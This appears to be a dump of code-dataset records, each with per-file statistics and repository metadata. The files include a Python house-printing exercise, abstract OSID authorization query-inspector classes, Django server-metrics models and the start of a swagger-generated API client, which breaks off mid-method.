| 1,640
| 80
| 36.92622
| 0.694214
| 0.012946
| 0
| 0.835739
| 0
| 0
| 0.165238
| 0
| 0
| 0
| 0
| 0
| 0.217182
| 1
| 0.016495
| false
| 0
| 0.01512
| 0.004124
| 0.037801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
af37238c950e88823aeedb488c9a75ffb5fc06ed
| 191
|
py
|
Python
|
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | null | null | null |
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | null | null | null |
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | 1
|
2019-09-22T06:27:49.000Z
|
2019-09-22T06:27:49.000Z
|
# Write a program that prints a house that looks exactly like the following:
print(" /\\ ")
print(" / \\ ")
print(" +----+ ")
print(" | .-.| ")
print(" | | || ")
print(" +-+-++ ")
| 23.875
| 76
| 0.47644
| 19
| 191
| 4.789474
| 0.631579
| 0.549451
| 0.659341
| 0.659341
| 0.32967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.246073
| 191
| 8
| 77
| 23.875
| 0.631944
| 0.387435
| 0
| 0.333333
| 0
| 0
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
afa9dcd7ca1c1814e058b20507c147a9a837c231
| 43
|
py
|
Python
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 1
|
2020-07-31T21:27:48.000Z
|
2020-07-31T21:27:48.000Z
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 2
|
2020-03-13T13:56:22.000Z
|
2020-03-30T08:58:59.000Z
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 1
|
2020-03-27T20:00:01.000Z
|
2020-03-27T20:00:01.000Z
|
import kube_cli.main
kube_cli.main.main()
| 10.75
| 20
| 0.790698
| 8
| 43
| 4
| 0.5
| 0.4375
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 3
| 21
| 14.333333
| 0.820513
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
afb65c8013e2bfe82b0bd368028d3a2967679a94
| 20,768
|
py
|
Python
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""Implementations of authorization abstract base class query_inspectors."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class AuthorizationQueryInspector:
"""The query inspector for examining authorization queries."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_explicit_authorizations_terms(self):
"""Gets the explicit authorization query terms.
:return: the query terms
:rtype: ``osid.search.terms.BooleanTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.BooleanTerm
explicit_authorizations_terms = property(fget=get_explicit_authorizations_terms)
@abc.abstractmethod
def get_related_authorization_id_terms(self):
"""Gets the related authorization ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
related_authorization_id_terms = property(fget=get_related_authorization_id_terms)
@abc.abstractmethod
def get_related_authorization_terms(self):
"""Gets the related authorization query terms.
:return: the query terms
:rtype: ``osid.authorization.AuthorizationQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.AuthorizationQueryInspector
related_authorization_terms = property(fget=get_related_authorization_terms)
@abc.abstractmethod
def get_resource_id_terms(self):
"""Gets the resource ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
resource_id_terms = property(fget=get_resource_id_terms)
@abc.abstractmethod
def get_resource_terms(self):
"""Gets the resource query terms.
:return: the query terms
:rtype: ``osid.resource.ResourceQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.resource.ResourceQueryInspector
resource_terms = property(fget=get_resource_terms)
@abc.abstractmethod
def get_trust_id_terms(self):
"""Gets the trust ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
trust_id_terms = property(fget=get_trust_id_terms)
@abc.abstractmethod
def get_agent_id_terms(self):
"""Gets the agent ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
agent_id_terms = property(fget=get_agent_id_terms)
@abc.abstractmethod
def get_agent_terms(self):
"""Gets the agent query terms.
:return: the query terms
:rtype: ``osid.authentication.AgentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authentication.AgentQueryInspector
agent_terms = property(fget=get_agent_terms)
@abc.abstractmethod
def get_function_id_terms(self):
"""Gets the function ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
function_id_terms = property(fget=get_function_id_terms)
@abc.abstractmethod
def get_function_terms(self):
"""Gets the function query terms.
:return: the query terms
:rtype: ``osid.authorization.FunctionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.FunctionQueryInspector
function_terms = property(fget=get_function_terms)
@abc.abstractmethod
def get_qualifier_id_terms(self):
"""Gets the qualifier ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
qualifier_id_terms = property(fget=get_qualifier_id_terms)
@abc.abstractmethod
def get_qualifier_terms(self):
"""Gets the qualifier query terms.
:return: the query terms
:rtype: ``osid.authorization.QualifierQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.QualifierQueryInspector
qualifier_terms = property(fget=get_qualifier_terms)
@abc.abstractmethod
def get_vault_id_terms(self):
"""Gets the vault ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
vault_id_terms = property(fget=get_vault_id_terms)
@abc.abstractmethod
def get_vault_terms(self):
"""Gets the vault query terms.
:return: the query terms
:rtype: ``osid.authorization.VaultQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.VaultQueryInspector
vault_terms = property(fget=get_vault_terms)
@abc.abstractmethod
def get_authorization_query_inspector_record(self, authorization_record_type):
"""Gets the authorization query inspector record corresponding to the given ``Authorization`` record ``Type``.
:param authorization_record_type: an authorization record type
:type authorization_record_type: ``osid.type.Type``
:return: the authorization query inspector record
:rtype: ``osid.authorization.records.AuthorizationQueryInspectorRecord``
:raise: ``NullArgument`` -- ``authorization_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(authorization_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.records.AuthorizationQueryInspectorRecord
class FunctionQueryInspector:
"""This is the query inspector for examining function queries."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_qualifier_hierarchy_id_terms(self):
"""Gets the qualifier hierarchy ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
qualifier_hierarchy_id_terms = property(fget=get_qualifier_hierarchy_id_terms)
@abc.abstractmethod
def get_qualifier_hierarchy_terms(self):
"""Gets the qualifier hierarchy query terms.
:return: the query terms
:rtype: ``osid.hierarchy.HierarchyQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.hierarchy.HierarchyQueryInspector
qualifier_hierarchy_terms = property(fget=get_qualifier_hierarchy_terms)
@abc.abstractmethod
def get_authorization_id_terms(self):
"""Gets the authorization ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
authorization_id_terms = property(fget=get_authorization_id_terms)
@abc.abstractmethod
def get_authorization_terms(self):
"""Gets the authorization query terms.
:return: the query terms
:rtype: ``osid.authorization.AuthorizationQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.AuthorizationQueryInspector
authorization_terms = property(fget=get_authorization_terms)
@abc.abstractmethod
def get_vault_id_terms(self):
"""Gets the vault ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
vault_id_terms = property(fget=get_vault_id_terms)
@abc.abstractmethod
def get_vault_terms(self):
"""Gets the vault query terms.
:return: the query terms
:rtype: ``osid.authorization.VaultQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.VaultQueryInspector
vault_terms = property(fget=get_vault_terms)
@abc.abstractmethod
def get_function_query_inspector_record(self, function_record_type):
"""Gets the function query inspector record corresponding to the given ``Function`` record ``Type``.
:param function_record_type: a function record type
:type function_record_type: ``osid.type.Type``
:return: the function query inspector record
:rtype: ``osid.authorization.records.FunctionQueryInspectorRecord``
:raise: ``NullArgument`` -- ``function_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(function_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.records.FunctionQueryInspectorRecord
class QualifierQueryInspector:
"""This is the query inspector for examining qualifiers queries."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_qualifier_hierarchy_id_terms(self):
"""Gets the qualifier hierarchy ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
qualifier_hierarchy_id_terms = property(fget=get_qualifier_hierarchy_id_terms)
@abc.abstractmethod
def get_qualifier_hierarchy_terms(self):
"""Gets the qualifier hierarchy query terms.
:return: the query terms
:rtype: ``osid.hierarchy.HierarchyQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.hierarchy.HierarchyQueryInspector
qualifier_hierarchy_terms = property(fget=get_qualifier_hierarchy_terms)
@abc.abstractmethod
def get_authorization_id_terms(self):
"""Gets the authorization ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
authorization_id_terms = property(fget=get_authorization_id_terms)
@abc.abstractmethod
def get_authorization_terms(self):
"""Gets the authorization query terms.
:return: the query terms
:rtype: ``osid.authorization.AuthorizationQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.AuthorizationQueryInspector
authorization_terms = property(fget=get_authorization_terms)
@abc.abstractmethod
def get_ancestor_qualifier_id_terms(self):
"""Gets the ancestor qualifier ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
ancestor_qualifier_id_terms = property(fget=get_ancestor_qualifier_id_terms)
@abc.abstractmethod
def get_ancestor_qualifier_terms(self):
"""Gets the ancestor qualifier query terms.
:return: the query terms
:rtype: ``osid.authorization.FunctionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.FunctionQueryInspector
ancestor_qualifier_terms = property(fget=get_ancestor_qualifier_terms)
@abc.abstractmethod
def get_descendant_qualifier_id_terms(self):
"""Gets the descendant qualifier ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
descendant_qualifier_id_terms = property(fget=get_descendant_qualifier_id_terms)
@abc.abstractmethod
def get_descendant_qualifier_terms(self):
"""Gets the descendant qualifier query terms.
:return: the query terms
:rtype: ``osid.authorization.FunctionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.FunctionQueryInspector
descendant_qualifier_terms = property(fget=get_descendant_qualifier_terms)
@abc.abstractmethod
def get_vault_id_terms(self):
"""Gets the vault ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
vault_id_terms = property(fget=get_vault_id_terms)
@abc.abstractmethod
def get_vault_terms(self):
"""Gets the vault query terms.
:return: the query terms
:rtype: ``osid.authorization.VaultQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.VaultQueryInspector
vault_terms = property(fget=get_vault_terms)
@abc.abstractmethod
def get_qualifier_query_inspector_record(self, qualifier_record_type):
"""Gets the qualifier query inspector record corresponding to the given ``Qualifier`` record ``Type``.
:param qualifier_record_type: a qualifier query inspector record type
:type qualifier_record_type: ``osid.type.Type``
:return: the qualifier query inspector record
:rtype: ``osid.authorization.records.QualifierQueryInspectorRecord``
:raise: ``NullArgument`` -- ``qualifier_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(qualifier_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.records.QualifierQueryInspectorRecord
class VaultQueryInspector:
"""This is the query inspector for examining vault queries."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_function_id_terms(self):
"""Gets the function ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
function_id_terms = property(fget=get_function_id_terms)
@abc.abstractmethod
def get_function_terms(self):
"""Gets the function query terms.
:return: the query terms
:rtype: ``osid.authorization.FunctionQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.FunctionQueryInspector
function_terms = property(fget=get_function_terms)
@abc.abstractmethod
def get_qualifier_id_terms(self):
"""Gets the qualifier ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
qualifier_id_terms = property(fget=get_qualifier_id_terms)
@abc.abstractmethod
def get_qualifier_terms(self):
"""Gets the qualifier query terms.
:return: the query terms
:rtype: ``osid.authorization.QualifierQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.QualifierQueryInspector
qualifier_terms = property(fget=get_qualifier_terms)
@abc.abstractmethod
def get_authorization_id_terms(self):
"""Gets the authorization ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
authorization_id_terms = property(fget=get_authorization_id_terms)
@abc.abstractmethod
def get_authorization_terms(self):
"""Gets the authorization query terms.
:return: the query terms
:rtype: ``osid.authorization.AuthorizationQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.AuthorizationQueryInspector
authorization_terms = property(fget=get_authorization_terms)
@abc.abstractmethod
def get_ancestor_vault_id_terms(self):
"""Gets the ancestor vault ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
ancestor_vault_id_terms = property(fget=get_ancestor_vault_id_terms)
@abc.abstractmethod
def get_ancestor_vault_terms(self):
"""Gets the ancestor vault query terms.
:return: the query terms
:rtype: ``osid.authorization.VaultQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.VaultQueryInspector
ancestor_vault_terms = property(fget=get_ancestor_vault_terms)
@abc.abstractmethod
def get_descendant_vault_id_terms(self):
"""Gets the descendant vault ``Id`` query terms.
:return: the query terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
descendant_vault_id_terms = property(fget=get_descendant_vault_id_terms)
@abc.abstractmethod
def get_descendant_vault_terms(self):
"""Gets the descendant vault query terms.
:return: the query terms
:rtype: ``osid.authorization.VaultQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.VaultQueryInspector
descendant_vault_terms = property(fget=get_descendant_vault_terms)
@abc.abstractmethod
def get_vault_query_inspector_record(self, vault_record_type):
"""Gets the vault query inspector record corresponding to the given ``Vault`` record ``Type``.
:param vault_record_type: a vault query inspector record type
:type vault_record_type: ``osid.type.Type``
:return: the vault query inspector record
:rtype: ``osid.authorization.records.VaultQueryInspectorRecord``
:raise: ``NullArgument`` -- ``vault_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(vault_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authorization.records.VaultQueryInspectorRecord
| 29.458156
| 118
| 0.675318
| 2,195
| 20,768
| 6.211845
| 0.059226
| 0.058673
| 0.06454
| 0.074221
| 0.87136
| 0.83359
| 0.777338
| 0.690942
| 0.679868
| 0.6707
| 0
| 0
| 0.228621
| 20,768
| 704
| 119
| 29.5
| 0.851124
| 0.562885
| 0
| 0.773481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.243094
| false
| 0
| 0.005525
| 0
| 0.756906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
a59714f6646d25287d9817f4d7b281e3012e6521
| 5,850
|
py
|
Python
|
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | 1
|
2018-11-04T09:36:35.000Z
|
2018-11-04T09:36:35.000Z
|
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS_api
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | null | null | null |
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS_api
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.db.models import ForeignKey, DateTimeField, DecimalField, IntegerField, CharField, deletion
from djchoices import DjangoChoices, ChoiceItem
from rest_framework.compat import MinValueValidator
from dbaas.models import Server
# ====================================================================================
class Metrics_Cpu(models.Model):
class Meta:
db_table = 'metrics_cpu'
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, null=False)
cpu_idle_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_user_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_system_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_iowait_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_irq_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_steal_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_guest_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
cpu_guest_nice_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_MountPoint(models.Model):
class Meta:
db_table = 'metrics_mount_point'
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, null=False)
mount_point = CharField(max_length=30, null=False, default='')
allocated_gb = DecimalField(decimal_places=1, max_digits=5, null=False, default=0)
used_gb = DecimalField(decimal_places=1, max_digits=5, null=False, default=0)
used_pct = DecimalField(decimal_places=1, max_digits=3, null=False, default=0)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_CpuLoad(models.Model):
class Meta:
db_table = 'metrics_cpu_load'
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
load_1min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
load_5min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
load_15min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_PingServer(models.Model):
class Meta:
db_table = 'metrics_ping_server'
class PingStatusChoices(DjangoChoices):
NORMAL = ChoiceItem("Normal", "Normal", 1)
CRITICAL = ChoiceItem("Critical", "Critical", 2)
BLACKOUT = ChoiceItem("Blackout", "Blackout", 3)
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
ping_status = CharField(max_length=30, null=False, choices=PingStatusChoices.choices, default='')
ping_response_ms = IntegerField(null=False, default=0)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_PingDb(models.Model):
class Meta:
db_table = 'metrics_ping_db'
class PingStatusChoices(DjangoChoices):
NORMAL = ChoiceItem("Normal", "Normal", 1)
CRITICAL = ChoiceItem("Critical", "Critical", 2)
BLACKOUT = ChoiceItem("Blackout", "Blackout", 3)
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
ping_db_status = CharField(max_length=30, null=False, choices=PingStatusChoices.choices, default='')
ping_db_response_ms = IntegerField(null=False, default=0)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_HostDetail(models.Model):
class Meta:
db_table = 'metrics_host_detail'
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
ipAddress = CharField(max_length=20, null=True, blank=True)
last_reboot = DateTimeField(null=True, blank=True)
cpu = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
ram_gb = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
os_version = CharField(max_length=40, null=True, blank=True)
db_version = CharField(max_length=30, null=True, blank=True)
db_version_number = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_CollectionError(models.Model):
class Meta:
db_table = 'metrics_collections_error'
server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
created_dttm = DateTimeField(editable=False, null=False)
metric_name = CharField(max_length=40, null=False, blank=True)
error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
error_msg = CharField(max_length=2000, null=False, default='')
# TODO: Metrics_DbTopSql
| 51.769912
| 119
| 0.737265
| 742
| 5,850
| 5.615903
| 0.142857
| 0.101512
| 0.115191
| 0.089753
| 0.862491
| 0.847132
| 0.827694
| 0.803216
| 0.739861
| 0.708423
| 0
| 0.022696
| 0.133846
| 5,850
| 112
| 120
| 52.232143
| 0.799684
| 0.018291
| 0
| 0.47191
| 0
| 0
| 0.03694
| 0.004356
| 0
| 0
| 0
| 0.008929
| 0
| 1
| 0
| false
| 0
| 0.05618
| 0
| 0.853933
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3c4d648d94eed64b82fb50ea553c49ae51297f8a
| 21,159
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class ApplicationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_application_using_post(self, application, **kwargs): # noqa: E501
"""Create an application # noqa: E501
Create an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application_using_post(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application application: application (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_application_using_post_with_http_info(application, **kwargs) # noqa: E501
else:
(data) = self.create_application_using_post_with_http_info(application, **kwargs) # noqa: E501
return data
def create_application_using_post_with_http_info(self, application, **kwargs): # noqa: E501
"""Create an application # noqa: E501
Create an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application_using_post_with_http_info(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application application: application (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_application_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `create_application_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'application' in params:
body_params = params['application']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/application', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
